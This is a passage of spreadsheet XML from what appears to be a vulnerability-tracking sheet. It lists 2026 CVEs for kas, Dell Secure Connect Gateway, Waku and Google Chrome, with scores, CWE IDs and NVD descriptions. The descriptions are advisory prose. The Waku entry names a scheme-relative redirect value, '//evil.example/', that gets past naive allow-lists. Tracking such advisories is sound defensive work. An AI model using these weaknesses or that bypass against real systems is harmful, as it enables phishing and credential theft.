          <t>kas is a setup tool for bitbake based projects. Prior to 5.4, internal SSH key setup triggered by SSH_PRIVATE_KEY or SSH_PRIVATE_KEY_FILE creates ~/.ssh/config when no user-specific SSH configuration exists and adds a global Host * rule containing StrictHostKeyChecking no. In kas/libcmds.py, ssh_no_host_key_check() runs without checking ctx.managed_env, so the setting persists after kas exits and affects future SSH sessions by the same local user, extending beyond the intended short-lived continuous integration environment. A later SSH connection can therefore accept an attacker-controlled host key without verification, increasing the risk of a man-in-the-middle attack that compromises session confidentiality or integrity. This issue is fixed in version 5.4.</t>
        </is>
      </c>
      <c r="S1223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54548</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79727</t>
        </is>
      </c>
      <c r="D1224" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1224" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1224" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1224" s="5" t="inlineStr"/>
      <c r="H1224" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1224" s="5" t="inlineStr"/>
      <c r="J1224" s="5" t="inlineStr"/>
      <c r="K1224" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1224" s="5" t="inlineStr"/>
      <c r="M1224" s="5" t="inlineStr"/>
      <c r="N1224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1224" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1224" s="5" t="inlineStr"/>
      <c r="Q1224" s="5" t="inlineStr">
        <is>
          <t>CWE-1258</t>
        </is>
      </c>
      <c r="R1224" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Exposure of Sensitive System Information Due to Uncleared Debug Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="S1224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79727</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79966</t>
        </is>
      </c>
      <c r="D1225" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1225" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1225" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1225" s="5" t="inlineStr"/>
      <c r="H1225" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1225" s="5" t="inlineStr"/>
      <c r="J1225" s="5" t="inlineStr"/>
      <c r="K1225" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1225" s="5" t="inlineStr"/>
      <c r="M1225" s="5" t="inlineStr"/>
      <c r="N1225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1225" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1225" s="5" t="inlineStr"/>
      <c r="Q1225" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R1225"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S1225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79966</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80169</t>
        </is>
      </c>
      <c r="D1226" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1226" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1226" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1226" s="5" t="inlineStr"/>
      <c r="H1226" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1226" s="5" t="inlineStr"/>
      <c r="J1226" s="5" t="inlineStr"/>
      <c r="K1226" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1226" s="5" t="inlineStr"/>
      <c r="M1226" s="5" t="inlineStr"/>
      <c r="N1226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1226" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1226" s="5" t="inlineStr"/>
      <c r="Q1226" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R1226"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S1226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80169</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80175</t>
        </is>
      </c>
      <c r="D1227" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1227" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1227" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1227" s="5" t="inlineStr"/>
      <c r="H1227" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1227" s="5" t="inlineStr"/>
      <c r="J1227" s="5" t="inlineStr"/>
      <c r="K1227" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1227" s="5" t="inlineStr"/>
      <c r="M1227" s="5" t="inlineStr"/>
      <c r="N1227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1227" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1227" s="5" t="inlineStr"/>
      <c r="Q1227" s="5" t="inlineStr">
        <is>
          <t>CWE-538</t>
        </is>
      </c>
      <c r="R1227" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insertion of Sensitive Information into Externally-Accessible File or Directory vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="S1227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80175</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1228" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49456</t>
        </is>
      </c>
      <c r="D1228" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1228" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1228" s="5" t="inlineStr"/>
      <c r="H1228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1228" s="5" t="inlineStr"/>
      <c r="J1228" s="5" t="inlineStr"/>
      <c r="K1228" s="5" t="inlineStr"/>
      <c r="L1228" s="5" t="inlineStr"/>
      <c r="M1228" s="5" t="inlineStr"/>
      <c r="N1228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1228" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1228" s="5" t="inlineStr"/>
      <c r="Q1228" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1228" s="5" t="inlineStr">
        <is>
          <t>Waku is the minimal React framework. Prior to version 1.0.0-beta.1, the unstable_redirect() helper exported from waku/router/server (packages/waku/src/router/define-router.tsx:156–161) accepts an arbitrary string and reflects it unchanged into the HTTP Location response header with no URL validation, scheme restriction, or path-only enforcement. Any application that passes user-controlled input to this helper — the natural pattern documented in the JSDoc and official fixtures — is vulnerable to open redirect attacks. An attacker who convinces a victim to click a crafted link can silently redirect the browser to an arbitrary external domain, enabling phishing, credential harvesting, and OAuth token theft. Additionally, scheme-relative URLs (//evil.example/) bypass naive https?://-only allow-list filters that developers might add as ad-hoc mitigations. This issue has been patched in version 1.0.0-beta.1.</t>
        </is>
      </c>
      <c r="S1228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49456</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87434</t>
        </is>
      </c>
      <c r="D1229" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1229" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1229" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1229" s="5" t="inlineStr"/>
      <c r="H1229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1229" s="5" t="inlineStr"/>
      <c r="J1229" s="5" t="inlineStr"/>
      <c r="K1229" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1229" s="5" t="inlineStr"/>
      <c r="M1229" s="5" t="inlineStr"/>
      <c r="N1229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1229" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1229" s="5" t="inlineStr"/>
      <c r="Q1229" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1229" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87434</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87442</t>
        </is>
      </c>
      <c r="D1230" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1230" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1230" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1230" s="5" t="inlineStr"/>
      <c r="H1230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1230" s="5" t="inlineStr"/>
      <c r="J1230" s="5" t="inlineStr"/>
      <c r="K1230" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1230" s="5" t="inlineStr"/>
      <c r="M1230" s="5" t="inlineStr"/>
      <c r="N1230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1230" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1230" s="5" t="inlineStr"/>
      <c r="Q1230" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R1230" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in Prerender in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87442</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87451</t>
        </is>
      </c>
      <c r="D1231" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1231" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1231" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1231" s="5" t="inlineStr"/>
      <c r="H1231" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1231" s="5" t="inlineStr"/>
      <c r="J1231" s="5" t="inlineStr"/>
      <c r="K1231" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1231" s="5" t="inlineStr"/>
      <c r="M1231" s="5" t="inlineStr"/>
      <c r="N1231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1231" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1231" s="5" t="inlineStr"/>
      <c r="Q1231" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1231" s="5" t="inlineStr">
        <is>
          <t>Information leak in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87451</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87452</t>
        </is>
      </c>
      <c r="D1232" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1232" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1232" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1232" s="5" t="inlineStr"/>
      <c r="H1232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1232" s="5" t="inlineStr"/>
      <c r="J1232" s="5" t="inlineStr"/>
      <c r="K1232" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L1232" s="5" t="inlineStr"/>
      <c r="M1232" s="5" t="inlineStr"/>
      <c r="N1232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1232" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1232" s="5" t="inlineStr"/>
      <c r="Q1232" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1232" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in GPU in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87452</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87485</t>
        </is>
      </c>
      <c r="D1233" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1233" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1233" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1233" s="5" t="inlineStr"/>
      <c r="H1233" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1233" s="5" t="inlineStr"/>
      <c r="J1233" s="5" t="inlineStr"/>
      <c r="K1233" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1233" s="5" t="inlineStr"/>
      <c r="M1233" s="5" t="inlineStr"/>
      <c r="N1233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1233" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1233" s="5" t="inlineStr"/>
      <c r="Q1233" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1233" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87485</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87498</t>
        </is>
      </c>
      <c r="D1234" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1234" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1234" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1234" s="5" t="inlineStr"/>
      <c r="H1234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1234" s="5" t="inlineStr"/>
      <c r="J1234" s="5" t="inlineStr"/>
      <c r="K1234" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1234" s="5" t="inlineStr"/>
      <c r="M1234" s="5" t="inlineStr"/>
      <c r="N1234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1234" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1234" s="5" t="inlineStr"/>
      <c r="Q1234" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1234" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87498</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87517</t>
        </is>
      </c>
      <c r="D1235" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1235" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1235" s="5" t="inlineStr"/>
      <c r="H1235" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1235" s="5" t="inlineStr"/>
      <c r="J1235" s="5" t="inlineStr"/>
      <c r="K1235" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L1235" s="5" t="inlineStr"/>
      <c r="M1235" s="5" t="inlineStr"/>
      <c r="N1235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1235" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1235" s="5" t="inlineStr"/>
      <c r="Q1235" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1235" s="5" t="inlineStr">
        <is>
          <t>Race condition in Mobile in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87517</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87521</t>
        </is>
      </c>
      <c r="D1236" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1236" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1236" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1236" s="5" t="inlineStr"/>
      <c r="H1236" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1236" s="5" t="inlineStr"/>
      <c r="J1236" s="5" t="inlineStr"/>
      <c r="K1236" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1236" s="5" t="inlineStr"/>
      <c r="M1236" s="5" t="inlineStr"/>
      <c r="N1236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1236" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1236" s="5" t="inlineStr"/>
      <c r="Q1236" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1236" s="5" t="inlineStr">
        <is>
          <t>Information leak in WebMCP in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87521</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87531</t>
        </is>
      </c>
      <c r="D1237" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1237" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1237" s="5" t="inlineStr"/>
      <c r="H1237" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1237" s="5" t="inlineStr"/>
      <c r="J1237" s="5" t="inlineStr"/>
      <c r="K1237" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1237" s="5" t="inlineStr"/>
      <c r="M1237" s="5" t="inlineStr"/>
      <c r="N1237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1237" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1237" s="5" t="inlineStr"/>
      <c r="Q1237" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1237" s="5" t="inlineStr">
        <is>
          <t>Information leak in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87531</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87539</t>
        </is>
      </c>
      <c r="D1238" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1238" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1238" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1238" s="5" t="inlineStr"/>
      <c r="H1238" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1238" s="5" t="inlineStr"/>
      <c r="J1238" s="5" t="inlineStr"/>
      <c r="K1238" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1238" s="5" t="inlineStr"/>
      <c r="M1238" s="5" t="inlineStr"/>
      <c r="N1238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1238" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1238" s="5" t="inlineStr"/>
      <c r="Q1238" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R1238" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87539</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87611</t>
        </is>
      </c>
      <c r="D1239" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1239" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1239" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1239" s="5" t="inlineStr"/>
      <c r="H1239" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1239" s="5" t="inlineStr"/>
      <c r="J1239" s="5" t="inlineStr"/>
      <c r="K1239" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1239" s="5" t="inlineStr"/>
      <c r="M1239" s="5" t="inlineStr"/>
      <c r="N1239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1239" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1239" s="5" t="inlineStr"/>
      <c r="Q1239" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1239" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87611</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87614</t>
        </is>
      </c>
      <c r="D1240" s="5" t="n">
        <v>3.1</v>
